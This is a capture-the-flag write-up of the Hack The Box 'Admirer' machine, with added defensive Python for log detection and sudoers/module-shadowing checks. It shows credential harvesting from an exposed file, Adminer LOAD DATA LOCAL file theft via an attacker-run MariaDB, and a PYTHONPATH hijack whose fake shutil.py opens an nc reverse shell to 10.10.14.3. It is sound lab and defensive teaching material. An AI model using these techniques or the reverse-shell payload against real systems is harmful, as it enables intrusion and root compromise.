Hack The Box Writeup | Admirer

Admirer is a Linux machine rated easy.

・Tools used
gobuster

1.Enumeration

Run AutoRecon to check the open ports.
The host is running ftp, ssh and http services.
The nmap output (http-robots.txt) shows that a "/admin-dir" directory exists.

# Nmap 7.91 scan initiated Mon Dec 28 02:45:35 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /results/10.10.10.187/scans/_full_tcp_nmap.txt -oX /results/10.10.10.187/scans/xml/_full_tcp_nmap.xml 10.10.10.187
Nmap scan report for 10.10.10.187
Host is up, received user-set (0.16s latency).
Scanned at 2020-12-28 02:45:35 UTC for 405s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 62 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 62 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDaQHjxkc8zeXPgI5C7066uFJaB6EjvTGDEwbfl0cwM95npP9G8icv1F/YQgKxqqcGzl+pVaAybRnQxiZkrZHbnJlMzUzNTxxI5cy+7W0dRZN4VH4YjkXFrZRw6dx/5L1wP4qLtdQ0tLHmgzwJZO+111mrAGXMt0G+SCnQ30U7vp95EtIC0gbiGDx0dDVgMeg43+LkzWG+Nj+mQ5KCQBjDLFaZXwCp5Pqfrpf3AmERjoFHIE8Df4QO3lKT9Ov1HWcnfFuqSH/pl5+m83ecQGS1uxAaokNfn9Nkg12dZP1JSk+Tt28VrpOZDKhVvAQhXWONMTyuRJmVg/hnrSfxTwbM9
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNHgxoAB6NHTQnBo+/MqdfMsEet9jVzP94okTOAWWMpWkWkT+X4EEWRzlxZKwb/dnt99LS8WNZkR0P9HQxMcIII=
|   256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBqp21lADoWZ+184z0m9zCpORbmmngq+h498H9JVf7kP
80/tcp open  http    syn-ack ttl 62 Apache httpd 2.4.25 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 4.2 (94%), Linux 4.4 (94%), Linux 3.18 (93%), HP P2000 G3 NAS device (93%), Linux 3.2 - 4.9 (93%), Linux 3.16 (92%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/28%OT=21%CT=1%CU=30550%PV=Y%DS=3%DC=T%G=Y%TM=5FE948
OS:64%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%TS=8)OPS(O1=
OS:M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7
OS:%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y
OS:%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD
OS:=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%D
OS:F=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK
OS:=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.006 days (since Mon Dec 28 02:44:06 2020)
Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   0.03 ms   172.17.0.1
2   161.20 ms 10.10.14.1
3   161.42 ms 10.10.10.187

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Enumerate the /admin-dir directory with gobuster

$ sudo gobuster dir -u http://10.10.10.187/admin-dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 100 -o gobuster -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/admin-dir
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Timeout:        10s
===============================================================
2021/01/03 03:39:24 Starting gobuster
===============================================================
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2021/01/03 03:51:28 Finished
===============================================================

Requesting "credentials.txt" yields a set of credentials

$ curl http://10.10.10.187/admin-dir/credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

2.Exploitation

Log in to FTP with the credentials obtained above
ftpuser
%n?4Wz}R$tTF7

Retrieve the files dump.sql and html.tar.gz

$ sudo ftp 10.10.10.187
[sudo] password for kali: 
Connected to 10.10.10.187.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            3405 Dec 02  2019 dump.sql
-rw-r--r--    1 0        0         5270987 Dec 03  2019 html.tar.gz
226 Directory send OK.
ftp> mget dump.sql
mget dump.sql? yes
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dump.sql (3405 bytes).
226 Transfer complete.
3405 bytes received in 0.00 secs (31.8359 MB/s)
ftp> mget html.tar.gz
mget html.tar.gz? yes
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for html.tar.gz (5270987 bytes).
226 Transfer complete.
5270987 bytes received in 8.67 secs (593.5189 kB/s)
ftp> exit
221 Goodbye.

Extracting "html.tar.gz" produces a "utility-scripts" folder. Enumerating the paths under "utility-scripts" reveals "adminer.php", and the page displays the Adminer version.

The version in use has a file inclusion vulnerability (a MySQL server under the attacker's control can read files from the host running Adminer).
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

Start the mysql service and create a database
sudo mysql -u root -p ""
create database admirer;
use admirer;
create table exploit (file VARCHAR(1000));

$ sudo systemctl start mysql
$ sudo mysql -u root -p ""
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 52
Server version: 10.3.24-MariaDB-2 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB []> create database admirer;
Query OK, 1 row affected (0.000 sec)

MariaDB []> use admirer;
Database changed
MariaDB [admirer]> create table exploit (file VARCHAR(1000));
Query OK, 0 rows affected (0.017 sec)

Change bind-address so that the server is reachable from outside

$ cat /etc/mysql/mariadb.conf.d/50-server.cnf | grep bind-address
#bind-address            = 127.0.0.1
bind-address             = 0.0.0.0

Restart the mysql service

$ sudo systemctl restart mysql


Access was denied, so grant privileges to a user connecting from the target

CREATE USER 'root'@'10.10.10.187' IDENTIFIED BY '';
GRANT ALL PRIVILEGES ON *.* TO 'root'@'10.10.10.187';
FLUSH PRIVILEGES;

$ sudo mysql -u root -p ""
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 39
Server version: 10.3.24-MariaDB-2 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB []> CREATE USER 'root'@'10.10.10.187' IDENTIFIED BY '';
Query OK, 0 rows affected (0.001 sec)

MariaDB []> GRANT ALL PRIVILEGES ON *.* TO 'root'@'10.10.10.187';
Query OK, 0 rows affected (0.001 sec)

MariaDB []> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.001 sec)

Enter the attacker-side MySQL server details into adminer.php and log in.

Run the following command to send the file contents to the "exploit" table in the MySQL database "admirer"

load data local infile '/var/www/html/index.php'
into table admirer.exploit
fields terminated by "\n"

Inspecting the data that was sent reveals credentials

Log in over SSH with them
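From the defender's side, the abuse above leaves a trace in the web server log: Adminer puts the database host it was pointed at in the server= query parameter of adminer.php requests, so a host outside the expected set is a strong signal. The following is an added example (not code from the writeup); the log lines are constructed, and the function name and allowlist are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not from the box).
SAMPLE_LOG = """\
10.10.14.3 - - [03/Jan/2021:03:55:10 +0000] "GET /utility-scripts/adminer.php?server=10.10.14.3&username=root HTTP/1.1" 200 3021 "-" "Mozilla/5.0"
192.168.1.20 - - [03/Jan/2021:03:56:01 +0000] "GET /utility-scripts/adminer.php?server=localhost&username=waldo&db=admirer HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
192.168.1.21 - - [03/Jan/2021:03:57:44 +0000] "GET /index.php HTTP/1.1" 200 6051 "-" "curl/7.72.0"
"""

# Hosts Adminer is legitimately expected to connect to (assumed allowlist).
ALLOWED_DB_HOSTS = {"localhost", "127.0.0.1"}

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def suspicious_adminer_logins(log_text, allowed=ALLOWED_DB_HOSTS):
    """Return (client_ip, db_server) pairs for adminer.php requests whose
    server= parameter names a database host outside the allowlist."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format access line
        url = urlsplit(m.group("path"))
        if not url.path.endswith("adminer.php"):
            continue
        for server in parse_qs(url.query).get("server", []):
            host = server.split(":")[0]  # drop an optional :port suffix
            if host not in allowed:
                hits.append((m.group("src"), server))
    return hits

if __name__ == "__main__":
    for src, server in suspicious_adminer_logins(SAMPLE_LOG):
        print(f"adminer.php login from {src} to unexpected DB host {server}")
```

On the PHP side, setting mysqli.allow_local_infile = Off in php.ini stops the mysqli client from answering LOAD DATA LOCAL requests from whatever server Adminer is pointed at.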

3.Privilege Escalation

Running sudo -l shows that "/opt/scripts/admin_tasks.sh" can be run with sudo

$ sudo -l
[sudo] password for waldo: 
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh

"admin_tasks.sh" presents a menu of options; selecting "6" runs "/opt/scripts/backup.py"

$ cat /opt/scripts/admin_tasks.sh
#!/bin/bash

...
backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}
...

Looking at "/opt/scripts/backup.py", it imports the "make_archive" function from shutil.

$ cat /opt/scripts/backup.py
#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)

Overriding the "make_archive" function with a shutil.py that is found before the standard library one gives privilege escalation.
shutil.py

import os

# Replaces shutil.make_archive with the same three-argument signature used by backup.py
def make_archive(dst, gztar, src):
    os.system('nc 10.10.14.3 4444 -e "/bin/sh"')

Run the script with PYTHONPATH pointing at the directory that holds the fake shutil.py and select option 6.

waldo@admirer:~$ cd /tmp/
waldo@admirer:/tmp$ vi shutil.py
waldo@admirer:/tmp$ cat shutil.py
import os

def make_archive(dst,gztar,src):
        os.system('nc 10.10.14.3 4444 -e "/bin/sh"')
waldo@admirer:/tmp$ sudo PYTHONPATH=/tmp/ /opt/scripts/admin_tasks.sh

[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option: 6
Running backup script in the background, it might take a while...
waldo@admirer:/tmp$ 

A reverse shell with root privileges is obtained

$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.187] 58766
id
uid=0(root) gid=0(root) groups=0(root)
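Two things make the escalation above work: the sudoers rule carries the SETENV tag, and backup.py's interpreter honours PYTHONPATH. The added example below (not the box's code; helper names are hypothetical) checks both from a defender's position: it confirms that a harmless marker module placed on PYTHONPATH is imported by a plain python3 but ignored when the interpreter runs in isolated mode (-I), and it flags sudoers entries that let the caller influence the environment.

```python
import os
import re
import subprocess
import sys
import tempfile

def shadow_module_wins(extra_flags):
    """Start a child interpreter with PYTHONPATH pointing at a directory that
    holds a harmless shutil.py (a marker only) and report whether that copy,
    rather than the standard-library shutil, is the one that gets imported."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "shutil.py"), "w") as f:
            f.write("SHADOW = True\n")  # constructed marker, no side effects
        env = dict(os.environ, PYTHONPATH=tmp)
        cmd = [sys.executable, *extra_flags, "-c",
               "import shutil; print(getattr(shutil, 'SHADOW', False))"]
        res = subprocess.run(cmd, env=env, capture_output=True, text=True, check=True)
        return res.stdout.strip() == "True"

# \b keeps NOSETENV: from matching as SETENV:
SETENV_RE = re.compile(r"\bSETENV:")

def risky_sudoers_entry(line):
    """True when a sudoers line lets the invoking user shape the environment of
    the privileged command: a SETENV tag (as on admin_tasks.sh above) or an
    env_keep default that preserves PYTHONPATH."""
    if SETENV_RE.search(line):
        return True
    return "env_keep" in line and "PYTHONPATH" in line

if __name__ == "__main__":
    print("shadow shutil imported by plain python3:", shadow_module_wins([]))
    print("shadow shutil imported with -I (isolated):", shadow_module_wins(["-I"]))
    print("sudoers rule risky:",
          risky_sudoers_entry("(ALL) SETENV: /opt/scripts/admin_tasks.sh"))
```

The corresponding fixes are a shebang of #!/usr/bin/python3 -I in backup.py and dropping SETENV from the sudoers rule so env_reset applies.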